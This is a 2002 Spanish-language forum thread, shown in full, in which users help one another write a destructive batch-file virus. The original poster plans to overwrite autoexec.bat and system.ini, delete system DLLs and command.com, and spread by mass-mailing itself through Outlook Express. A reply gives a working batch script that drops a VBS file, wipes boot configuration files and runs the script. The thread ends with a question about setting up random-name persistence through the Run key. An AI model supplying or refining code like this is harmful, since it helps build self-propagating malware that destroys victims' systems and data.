PDA

Ver la versión completa : programacion de virus bat



jocanor
28-12-2002, 19:43
como no hay seccion virus lo posteo aki :(

pos vereis toy currandome un bat k seria lo siguiente:



1- al ser ejecutado el bat crea un archivo en C:\windows\system llamado you can see.txt (sin espacios)

2-la rutina del bat seria borrar el contenido de los archivos:

autoexec.bat
system.ini

i llenarlos ocn el contenido:

you can see

tambien borrar del sistema los archivos:

numerosas dll
command.com

pero antes de esto el bat tendria k crear un script de visual basic (.vbs)
pero esto no lo se hacer con un bat, alguien me puede ayudar, es k si no creo el script de vb no puedo hacer k se propague por mail, lo k aria el script seria autoenviar copias del virus por outllock express (el codigo de un script de bsic k hiciera eso ya lo tengo escrito) i despues ejecutar un un bat creado por el primer bat, k es el k contiene la rutina destructiva.

no se si me e explicado bien...

en fin k mi duda es:

¿como se puede crear un script de basci desde un bat?

enga un saludo!!!!!!

<PICCOLO>
28-12-2002, 20:32
sería mas facil crear "a mano" el script de vbs y hacer que se ejecute cuando se ejecuta el bat, con un programa de esos joiners que puedes unir mas de un archivo y que se abran a la vez. No se si existe la posibilidad de unir un bat con uno de esos scripts y hacer que se ejecuten al mismo tiempo, pero si existe no será muy dificil de encontrar

jocanor
29-12-2002, 10:49
no, no existe k yo sepa, pero hay muchos virus k lo hacen asi k si alguien encuenta el codigo fuente de un virus en bat, por favor k mo lo haga saber, a ver si da ahy saco algo en claro:D

TseTse
29-12-2002, 12:24
Lo triste es que o no sabes ni que nombre tienen dichos virus o no te sale de los huevos buscarlo en google.
http://www.google.com/search?q=batch+virus&ie=UTF-8&oe=UTF-8&hl=es&lr=
Los virus que se crean usando un archivo *.bat (Batch Processing (DOS Batch File)) se conocen como Batch Virus.

TseTse

<PICCOLO>
29-12-2002, 19:34
Tas muy alterado TseTse, necesitas unas vacaciones:0=
saludos

jocanor
29-12-2002, 20:50
aer, tsetse tio por segunda vez:

no me mates!!!!! (i no me metes otra vez el dibujo ese)

pos ale, ya se hacerlo pero lo he pensao yo solo, por si alguien le interesa...

echo (contenido del vbs sin parentesis) > ruta del vbs
para la segunda linea:
echo (lo mismo k antes) >> ruta del vbs i ya ta


asi todas las lineas k kieras!

CrAcKzMe
30-12-2002, 01:27
jur, yo de bat se un ratoillo jeje,y he echo virus, worms, floods y de todo un poco con batch, que me pillo la deria una vez xD. Pregunta lo que quieras pero q sea specifico y te hago el codigo, en un principio lo que pides tu es tan facil como:

@echo off
:init
echo ViRuS XaPUZa
echo Aqui es donde creo el VBS malicious ;):
:vbs
echo CODIGO QUE QUIERAS EN VBS > archivo.vbs
echo CODIGO QUE QUIERAS EN VBS >> archivo.vbs
echo CODIGO QUE QUIERAS EN VBS >> archivo.vbs
echo CODIGO QUE QUIERAS EN VBS >> archivo.vbs
echo CODIGO QUE QUIERAS EN VBS >> archivo.vbs
cd C:\windows\system\
echo you can see > youcansee.txt
cd C:\
echo you can see > autoexec.bat
echo you can see > config.sys
:exec
echo ahora ejecutamos el vbs creado anteriormente
start archivo.vbs

Mas facil....batch parece simple, y en realidad lo es, pero tiene funciones muy interesantes y algo mas complejillas.
Salu2

jocanor
30-12-2002, 12:58
muchas gracias crackzme pero todo eso ya lo se hacer, pero gracias de todas formas...

CrAcKzMe
30-12-2002, 16:04
Si lo sabes hacer para q lo preguntas melón, pregunta algo mas dificil entonces xD

juanma.m.d
30-12-2002, 17:44
jejejje lo qme ha gustado ha sido la indirecta de jocanor : "como no hay seccion de virus" xDDD

ramgo
30-12-2002, 17:51
Jocanor, los hiciste postear, para ke eso ya lo supieras, como dice cracksme: si ya lo sabes hacer para ke preguntas.

jocanor
31-12-2002, 22:24
a ver, lo postee, i despues lo averigue, pero el post ya estava puesto...
ad+ siempre se parende algo ahora ya se a kien preguntarle en cuestion de virus.
:0= :0= :0= :0= :0=

CrAcKzMe
01-01-2003, 04:32
weno, ntonces alfinal no tienes ninguna pregunta 'dificil' sobre batch, no?

jocanor
02-01-2003, 17:13
sobre batch no, pero sobre vbscript si!!!

verás...si hago un virus k se copie en el directorio \%windir%\ por ejemplo....i le pongo k el nombre lo elija al azar entre varios, como por ejemplo:

cdefg.vbs
rf3rgfre.vbs
r3tg543543.vbs

como hago luego la entrada en run para k se inicie cada vez k se encienda la makina?si no se el nombre k va a salir...